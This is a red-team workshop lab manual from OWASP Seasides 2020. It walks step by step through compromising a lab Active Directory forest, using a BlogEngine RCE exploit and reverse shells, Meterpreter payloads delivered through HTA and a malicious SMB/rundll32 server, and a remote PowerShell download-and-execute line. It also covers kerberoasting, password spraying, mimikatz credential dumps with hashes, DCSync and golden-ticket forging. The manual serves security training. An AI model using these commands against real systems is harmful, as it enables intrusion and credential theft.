Decoding the Art of Red Teaming - OWASP Seasides

OWASP SEASIDES 2020
Lab Manual
By Satyam & Yash
Abstract
This Lab Manual is a reference to “Decoding the art of Red
Teaming” workshop
5th
March 2020
International Centre, Goa
Instructor & Trainer

1 | P a g e
OWASP Seasides 2020 Decoding the Art of Red Teaming By Satyam & Yash
Challenge 1:
Scan the lab network [172.16.1.0/24] for any web service running on port
80 using network scanner like nmap.
It can be seen that 172.16.1.3 is hosting an IIS 8.0 webserver, which can be
accessed via browser.

2 | P a g e
After some enumeration the version of the CMS is determined
“BlogEngine 3.3.6.0” login page can be found at
“http://172.16.1.3/Account/login.aspx?ReturnURL=/admin/”
However, after googling the default credentials for the founded blog
version & trying it in the login page, it seems to be successful.

3 | P a g e
After searching for “BlogEngine 3.3.6.0” exploit in the internet, we found a
working exploit [authenticated RCE] which presents us with a reverse shell.
[Exploit Link] :
https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/aspx/webapps/47010.py
Download the exploit & understand the argument to be used during
running the exploit.
“-t” switch is for target machine
“-l” switch specifies the attacking machine IP on the mentioned port.
We need to modify the exploit a bit by commenting as follows:

4 | P a g e
Start your netcat listener on the port which you specified on the exploit.
Next save & run the exploit to achieve a beautiful reverse shell on the
attacking machine.
The user which we are running with is “iis apppool.net v4.5”, let’s not
limit our functionality & move to meterpreter shell.
Fire up metasploit & start a server hosting malicious HTA file using the
following module:
exploit/windows/misc/hta_server

5 | P a g e
Set the module setting such that it reflects below & run it.
[NOTE]: All the machines in the lab are patched & up to date x64 bit
systems.
A malicious HTA file gets generated. We will need this HTA file path to
upgrade our netcat shell to meterpreter shell.

6 | P a g e
Copy the file path & using “mshta.exe” run the hta file, we will get an
active meterpreter session.
We are running under Network User privilege, run the following command
to upgrade session to meterpreter.
Load powershell in the above selected meterpreter session.
powershell_shell

7 | P a g e
Check if the computer we have our foothold is domain joined by executing
the following powershell command:
Test-ComputerSecureChannel

8 | P a g e
Challenge 2:
Enumerate the Forest, Domain & all the computers present in the
environment.
After loading PowerView.ps1 in to the memory execute the following to
get info about the forest:
Get-NetForest –Verbose
The Name of the root-level Domain is tropicalbank.local.
This root-level Domain have two child domain, mgmt.tropicalbank.local &
fin.tropicalbank.local
Similarly, the computer domain’s in which we have initial access can be
enumerated as follows:

9 | P a g e
Get-NetDomain –Verbose
Similarly, other domains can be enumerated as follows:
To list all the computers, present in the domain environment we use
Powerview’s “Get-NetComputer” command.

10 | P a g e
All the domain users in the “mgmt.tropicalbank.local” domain can be
enumerated using the following query.
PS > Get-NetUser * -Domain mgmt.tropicalbank.local | Select-Object -Property
name,samaccountname,description,memberof,serviceprincipalname
<SNIP CODE>
name : krbtgt
samaccountname : krbtgt
description : Key Distribution Center Service Account
memberof : CN=Denied RODC Password Replication
Group,CN=Users,DC=mgmt,DC=tropicalbank,DC=local
serviceprincipalname : kadmin/changepw
name : Ryan Collins
samaccountname : ryan
description :
memberof :
serviceprincipalname :
</SNIP CODE>
List all the SPN’s set in the “mgmt.tropicalbank.local” domain.

11 | P a g e
<SNIP CODE>
PS > Get-NetUser –SPN
logoncount : 0
badpasswordtime : 01-01-1601 05:30:00
distinguishedname : CN=Alik Ivanov,CN=Users,DC=mgmt,DC=tropicalbank,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : Alik Ivanov
userprincipalname : alik@mgmt.tropicalbank.local
name : Alik Ivanov
objectsid : S-1-5-21-1013430952-3072928830-4148388053-1126
samaccountname : alik
codepage : 0
samaccounttype : 805306368
accountexpires : 9223372036854775807
cn : Alik Ivanov
whenchanged : 27-02-2020 11:35:21
instancetype : 4
usncreated : 17204
objectguid : 1aa7604a-ee08-47d1-a336-8403aeef0ad3
sn : Ivanov
lastlogoff : 01-01-1601 05:30:00
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=tropicalbank,DC=local
dscorepropagationdata : 01-01-1601 00:00:00
serviceprincipalname : FTP/WEB-SRV.mgmt.tropicalbank.local
givenname : Alik
lastlogon : 01-01-1601 05:30:00
adspath : LDAP://CN=Alik Ivanov,CN=Users,DC=mgmt,DC=tropicalbank,DC=local
</SNIP CODE>

12 | P a g e
It is clearly seen that SPN is set on the “alik” user of FTP service.
Let’s request the TGS for the FTP service & crack the “alik” user account
NTLM using only Power Shell command.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList
"FTP/WEB-SRV.mgmt.tropicalbank.local"
Next up we upload mimikatz binary to the target machine & export the
requested FTP ticket.
The Kerberos tickets can be exported using the mimikatz uploaded binary.

13 | P a g e
C:UsersPublic>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 May 13 2019 01:35:04
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # kerberos::list /export
The ticket is successfully exported in a “.kirbi” file, let’s now download it
to the attacking machine to perform some kerberoasting.
Using meterpreter download functionality we can easily download files
from the compromised web server.

14 | P a g e

15 | P a g e
Challenge 3:
Kerberoast the TGS ticket just requested & extract clear-text password out
of the ticket.
We will use the “tgsrepcrack.py” to perform kerberoast against the
requested ticket. We will require a dictionary to crack it.
Head to the Red Team Tools provided to you under “kerberoast/”
directory you can find “tgsrepcrack.py”.
The password dictionary is located at the same directory.
root@kali:~/Desktop/Tools/kerberoast# python tgsrepcrack.py passwords.txt 1-40a10000-
WEB-SRV$@FTP~WEB-SRV.mgmt.tropicalbank.local-MGMT.TROPICALBANK.LOCAL.kirbi
found password for ticket 0: fromRussia#1 File: 1-40a10000-WEB-SRV$@FTP~WEB-
SRV.mgmt.tropicalbank.local-MGMT.TROPICALBANK.LOCAL.kirbi
All tickets cracked!
Awesome! We perform kerberoast on the exported ticket & we have a
clear text password of the Alik user “fromRussia#1”.
During Red Team engagement, password spraying is a common technique
to gain intial foothold, however in a stealthy manner. We will perform
password spraying against users present in the Domain environment.
But first we need some information like all the computers, users present in
the domain environment. We will use the “crackmapexec” smb

16 | P a g e
functionality to list all the computers present with their hostname & the
Operating system running.
The output can be formatted/filtered using the “tee” & “cut”
functionality, as of now we want only the IP Address of the live computers
in the lab environment.
We can also filter the Port written at the end of the IP Address as follows:

17 | P a g e
In password spraying, we want the Domain users & the live computers.
Create a file which will have the user list in the domain. All the users in the
domain can filtered out using “Get-NetUser” PowerView functionality.
The below image depicts the user file.

18 | P a g e
We have all the requirement except one thing, we do not want to go to a
specific computer & try different username & password. Let’s create a
bash script to automate password spraying.
We have the ‘alik’ user password from the previous challenge.
The script simply makes connections to all the computers that is provided
as a list & try the username (from list) with the specified password.

19 | P a g e
Challenge 4:
After password spraying, the password of Eva user has been identified,
after enumeration it is also seen that “Eva” is local administrator on HR-
Computer.
Let’s move to HR-Computer with Eva
privileges using Metasploit “psexec” module.

20 | P a g e
MSF module: exploit/windows/smb/psexec
Now let’s use this module & set all the requirement as follows:
Use the VPN server allotted IP as LHOST, the below picture depicts this
(with the tun0 interface)
Configure all the options according to the requirements: -

21 | P a g e
[Note] Remember to set the domain & the IP address allotted to you after
connecting to the VPN server.
Let’s run the module to get our foothold in the HR-Comp machine
[172.16.1.11]. After running the module, we will see like:

22 | P a g e
Following the Red Team Attack path cycle, now let’s enumerate the
environment of this machine, we will upload mimikatz to the target
machine & then list out all the tokens, creds available at the time of
execution.
Running mimikatz after enabling Debugging privilege, we will try to logon
passwords.
mimikatz # privilege::debug
Privilege '20' OK
We have enabled debug privilege. Now let’s list all the logon passwords
available.
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 10795377 (00000000:00a4b971)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/27/2020 4:41:10 AM
SID : S-1-5-18
msv :
[00000003] Primary
* Username : walter

23 | P a g e
* Domain : .
* NTLM : 315121dfb23fb94ee028f7d1095924d2
tspkg :
wdigest :
* Username : walter
* Domain : (null)
* Password : (null)
kerberos :
* Username : walter
* Domain : (null)
* Password : (null)
ssp :
credman :
----------SNIP------------
Hurray for us, we have a user name “walter”, let’s enumerate the
whereabouts of this user.
Also since we are running as “NT AUTHORITYSYSTEM” privileges we need
to impersonate the domain user like Daniel. For impersonation follow the
below process:
1) Search any process running with “MGMTeva” privileges & note
down the ProcessID [here 4548], here it is confirmed using ‘ps’
command on meterpreter.

24 | P a g e
2) Perform the migration to achieve impersonation & check if the
migration is successful with the current user identity.
3) Spawn a shell & then query about the user “walter” user.
Below output clearly states that “walter” user is a domain user & is added
to local administrators group of a machine but the thing is that we do not
know about the computer in which he is a local admin.

25 | P a g e
Now, to specifically look the computer in which our user “walter” is a local
administrator we use PowerView.
Load the PowerShell module in the meterpreter session.
<Code Snip>
load powershell
</Code Snip>

26 | P a g e
Enter in the Powershell prompt as follows & load the powerview
command:
<Code Snip>
iex (New-Object
Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master
/PowerView/powerview.ps1')
</Code Snip>
We have loaded PowerView in the computer memory, execute the below
command to enumerate the membership of walter user.
<Code Snip>
Get-NetLocalGroup -ComputerName CHILD-OWASP.mgmt.tropicalbank.local -GroupName Administrators |
select AccountName
</Code Snip>

27 | P a g e
We have found that the “walter” user is local administrator on “CHILD-
OWASP.mgmt.tropicalbank.local” machine which is one of the Child
Domain Controller in the forest.
Let’s move laterally to the child Domain Controller with walter privileges.

28 | P a g e
Challenge 5:
For Lateral movement to the “CHILD-OWASP” we will deliver our payload
via our own SMB server.
We will start our malicious SMB server in the attacking box using the
following Metasploit module:
exploit/windows/smb/smb_delivery
[Note]: The “SRVHOST” option of the module must be the user’s VPN IP.
Select the target as DLL [No. 2], we will deliver our malicious payload via
this DLL.
Set the x64 arch payload (as most of the systems in lab is of 64-bit arch):
set payload “windows/x64/meterpreter/reverse_tcp”

29 | P a g e
With our SMB server configured, we will use this in conjunction with
“auxiliary/admin/smb/psexec_command” module which is a method to
deliver the payload [forcefully].
auxiliary/admin/smb/psexec_command
What we are trying to achieve is to forcefully connect the OWASP-CHILD
machine to our malicious SMB server which then delivers our shell & a
meterpreter session would be establish.
The following options must be set as it is for the psexec_command
module: -
<Code Snip>
set COMMAND rundll32.exe 192.168.50.11OtuZYztest.dll,0
set RHOSTS 172.16.1.5

30 | P a g e
set SMBUser walter
set SMBDomain mgmt
set SMBPass cc5e9acbad1b25c9aad3b435b51404ee:315121dfb23fb94ee028f7d1095924d2
</Code Snip>
All these settings with our malicious SMB server running in background.
And as soon as we run the auxiliary module, the target connects back to us
& a malicious DLL file is delivered.
We have moved laterally to the CHILD-Domain Controller of the
“tropicalbank.local” forest

31 | P a g e
Challenge 6:
Continuing our Red Team Attack life cycle, we will now enumerate the
environment. Also, we have a foothold on the CHILD-OWASP machine.
Since the process spawned is 64-bit process (corresponding to x64 payload
in SMB_delivery) we can load kiwi module in the meterpreter session.
We have been granted debug privilege, now let’s dump all the logged on
session creds.
<Code Snip>
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 15886081 (00000000:00f26701)
Session : Interactive from 7
User Name : chris
Domain : MGMT
Logon Server : CHILD-OWASP
Logon Time : 27-02-2020 12:08:14

32 | P a g e
SID : S-1-5-21-1013430952-3072928830-4148388053-1110
msv :
[00000003] Primary
* Username : chris
* Domain : MGMT
* NTLM : da82b1cd896dffdafcfedcbc70e60046
* SHA1 : 549bae428b902e92953600e56f6200c71b0de122
* DPAPI : 47c1daed65e0bb9121909ecf5180c7d9
tspkg :
wdigest :
* Username : chris
* Domain : MGMT
* Password : (null)
kerberos :
* Username : chris
* Domain : MGMT.TROPICALBANK.LOCAL
* Password : (null)
ssp :
credman :
</Code Snip>
We have found a user “chris” whose NTLM hash has been extracted, we
need to enumerate about the user like local groups, domain groups which
he is a part of.
Load the Powershell module in our established meterpreter session.

33 | P a g e
<Code Snip>
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > iex (New-Object
Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/maste
r/PowerView/powerview.ps1")
</Code Snip>

34 | P a g e
After loading Power Shell, PowerView has been imported directly into the
system memory.
PS > Get-NetUser chris
The “chris” user is a member of “Domain Admins” & a Local
Administrator too in this machine. Let’s find more interesting capabilities
😊
Previously, we have discovered that there are 2 domains in this forest,
“MGMT.tropicalbank.local” & “FIN.tropicalbank.local”, we have
compromised the MGMT domain let’s now try to spread our compromise
to the next domain which is the Finance department.

35 | P a g e
Enumerate the OU’s present in the “fin.tropicalbank.local” domain: -
PS > Get-NetOU -Domain fin.tropicalbank.local -verbose
VERBOSE: Get-DomainSearcher search string: LDAP://CHILD-
OWASP.mgmt.tropicalbank.local/DC=fin,DC=tropicalbank,DC=local
LDAP://CHILD-OWASP.mgmt.tropicalbank.local/OU=Domain Controllers,DC=fin,DC=tropicalbank,DC=local
LDAP://CHILD-OWASP.mgmt.tropicalbank.local/OU=Cashier,DC=fin,DC=tropicalbank,DC=local
A OU with name “Cashier” is discovered, now leveraging scripting nature
of powershell let’s store this in a variable.
Querying on this specific OU path will reveal its members [e.g.
enumerating OU members]

36 | P a g e
The query can then be further precise to the following:
PS > Get-NetUser -Domain fin.tropicalbank.local -ADSpath $OUpath | select name
name
----
Financer
A user named “Financer” is discovered in this OU. Let’s enumerate the
whereabouts of this user & the ACL permissions applied on this user.
More specifically we are interested in any misconfigurations set on this
user & it’s association with any privileged group.
<Code Snip>
PS > Get-NetUser -Domain fin.tropicalbank.local -User Financer

37 | P a g e
instancetype : 4
usncreated : 16553
objectguid : b91381e3-f0c6-4404-aa3d-4bd36b02512b
lastlogoff : 01-01-1601 05:30:00
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=tropicalbank,DC=local
dscorepropagationdata : {28-02-2020 16:30:39, 28-02-2020 15:31:46, 28-02-2020 15:30:39, 28-02-2020
14:58:45...}
givenname : Financer
memberof : CN=Administrators,CN=Builtin,DC=fin,DC=tropicalbank,DC=local
lastlogon : 01-01-1601 05:30:00
</Code Snip>
We have confirmed that Financer user is a local administrator on the
CHILD1-OWASP machine.
Let’s now enumerate the ACL’s applied on this user using “dsacls.exe”
executable present by default in Windows Server.
PS > dsacls.exe CN=Financer,OU=Cashier,DC=fin,DC=tropicalbank,DC=local | Select-String chris
Allow MGMTchris FULL CONTROL
Allow MGMTchris FULL CONTROL
It is confirmed after executing the above command that “chris” user have
FULL CONTROL [or GenericALL] rights on the “Financer” user.

38 | P a g e
We can reset the Financer user password without knowing the current one
or we can perform targeted kerberoasting but following the Red Team
approach in one of the stealthiest way we perform “dcsync” attack on the
Financer user.
Which means we will retrieve the NTLM hash of the Financer user
remotely.

39 | P a g e
Challenge 7:
Impersonate the Domain Admin [chris] user & then perform DCSync attack
against “Financer” user. Move laterally to the CHILD1-OWASP machine.
Currently, we are running as “NT AUTHORITYSYSTEM”, we have the list
to impersonate any user present in the CHILD-OWASP Domain Controller.
To list all the available tokens, we use meterpreter incognito module.
It can be seen that a token of “MGMTchris” is present, let’s impersonate
this user to perform further operations.
[Note]: After impersonation we will run as “MGMTchris”

40 | P a g e
We now have the privileges of “MGMTchris” which is Domain Admin in
CHILD-OWASP.
It was previously known that we have FULL CONTROL over Financer user
[Local Admin] CHILD1-OWASP. To perform DCSync attack we run the
following command:
kiwi_cmd ""lsadump::dcsync /user:Financer /domain:fin.tropicalbank.local""
The NTLM hash of Financer user is successfully extracted, to spread the
compromise we will move to FIN.tropicalbank.local domain using the
above attack that is demonstrated.

41 | P a g e
We will use the metasploit’s psexec module for spreading the
compromise.
EXPLOIT module : windows/smb/psexec_psh
Payload: windows/x64/meterpreter/reverse_tcp
Carefully enter the “smbpass” parameter, with LN:NTLM hash format of
Financer user recently extracted using DCSync attack.
And after running the module we have a beautiful reverse shell active.

42 | P a g e
All the logon passwords can be seen using the metaploit’s kiwi module but
we are more interested in spreading the compromise. List all the processes
using “ps” command.
Let’s enumerate the “HANK” user privileges. Simply, spawning a ‘shell’ in
the current meterpreter session will facilitate our findings.
It can be seen that hank user is the Domain Admin of
“fin.tropicalbank.local” domain.

43 | P a g e

44 | P a g e
Challenge 8:
Forge Golden Ticket to make our way to the Forest Domain Controller.
Some of the important ingredients to make Golden Ticket are:
1) Krbtgt account hash of the current domain.
2) Child Domain SID number
3) Parent Domain SID history
4) User ID for impersonation
We will extract all the things in a sequential manner. In the previously
established shell extract the “krbtgt” user account hash as follows: -
kiwi_cmd ""lsadump::dcsync /user:FINkrbtgt /domain:fin.tropicalbank.local""
krbtgt account NTLM hash of the fin.tropicalbank.local is extracted.

45 | P a g e
Or alternatively we can migrate to “FINHank” user account context using
migrate functionality of meterpreter.
Our second requirement is fulfilled here as the SID number is visible.
Now, we will try to figure out the SID of parent domain [tropicalbank.local]
One of the interesting way to enumerate the SID number of a domain
account name, we can leverage the powershell .NET functionality. The
krbtgt account SID history of fin.tropicalbank.local domain is enumerated
as follows:

46 | P a g e
<Code Snip>
$objUser = New-Object System.Security.Principal.NTAccount("domain","username")
$strSID = $objUser.Translate([System.Security.Principal.SecurityIdentifier])
$strSID.Value
</Code Snip>
Similarly, the “tropicalbankkrbtgt” account SID is enumerated as follows:
One can use any UserID for impersonation (even non-existent)!
We will upload mimikatz.exe binary to our established session, as follows:
We have everything that is needed to forge a golden ticket, let’s now
spawn a shell using meterpreter & make our way to the Forest Domain
Controller.
Also at this stage we cannot access the Forest DC “OWASP-DC”

47 | P a g e
The syntax to forge a golden ticket is follows:
<Code Snip>
kerberos::golden /user:Administrator /domain:fin.tropicalbank.local /sid:S-1-5-21-1073541793-
3875336119-1079278973 /krbtgt:e83d27ac455f9fcf892ca71113e0a2aa /sids:S-1-5-21-1859071807-
39610884-2113916612-519 /ptt
<Code Snip>
In the SIDS parameter “519” RID is appended because it belongs to the
Enterprise Admin of a Domain.
Here our forged ticket says that we are a member of Enterprise Admins at
the forest that is “tropicalbank.local” & we can access the Forest Domain
Controller using the recently passed ticket.

48 | P a g e

Decoding the Art of Red Teaming - OWASP Seasides

More Related Content

What's hot (14)

Similar to Decoding the Art of Red Teaming - OWASP Seasides (20)

Recently uploaded (20)

Decoding the Art of Red Teaming - OWASP Seasides